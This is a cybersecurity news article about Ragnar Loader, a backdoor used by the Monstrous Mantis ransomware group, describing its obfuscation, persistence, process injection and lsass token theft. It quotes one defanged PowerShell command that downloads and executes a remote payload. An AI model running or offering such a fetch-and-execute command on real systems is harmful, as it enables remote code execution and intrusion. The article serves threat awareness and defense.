A sophisticated malware toolkit known as Ragnar Loader has been identified as a critical component in targeted ransomware attacks. The loader, also known as Sardonic Backdoor, serves as the primary infiltration mechanism for the Monstrous Mantis ransomware group, formerly known as Ragnar Locker, which has been attacking organizations since its emergence in 2020. Catalyst researchers’ analysis reveals that Ragnar Loader utilizes PowerShell-based payloads for execution, incorporating strong encryption and encoding methods including RC4 and Base64 to conceal its operations. Security researchers have determined that Ragnar Loader’s primary function is to establish and maintain persistent access to compromised systems. The loader is typically distributed as part of a comprehensive toolkit that includes multiple components: a node initialization script, pivoting files, remote desktop protocol files, and remote code execution scripts. The toolkit employs multi-layered obfuscation, dynamic decryption routines, and sophisticated persistence mechanisms that pose significant challenges to conventional security defenses. Once established, the backdoor can receive multiple commands from its command and control server, including functions to load DLL plugins, read and write files, execute shellcode, and create interactive sessions. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. After initial execution, Ragnar Loader decrypts byte arrays by first decompressing them and then applying RC4 decryption. A typical infection begins with PowerShell commands such as: “powershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString(‘ [.]nip[.]io/4c8b09’)” which downloads and executes the initial payload. Once deployed, the malware enables threat actors to maintain long-term footholds within targeted environments, facilitating extended malicious operations. The malware employs process injection strategies to establish stealthy control over compromised systems. This technique allows the malware to operate with extended system access while hiding behind legitimate processes. This fileless persistence technique helps the malware remain undetected on compromised systems. The loader injects its payload into legitimate Windows processes, particularly WmiPrvSE.exe, after stealing tokens from lsass.exe to elevate privileges. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 11 Mar 2025 06:50:16 +0000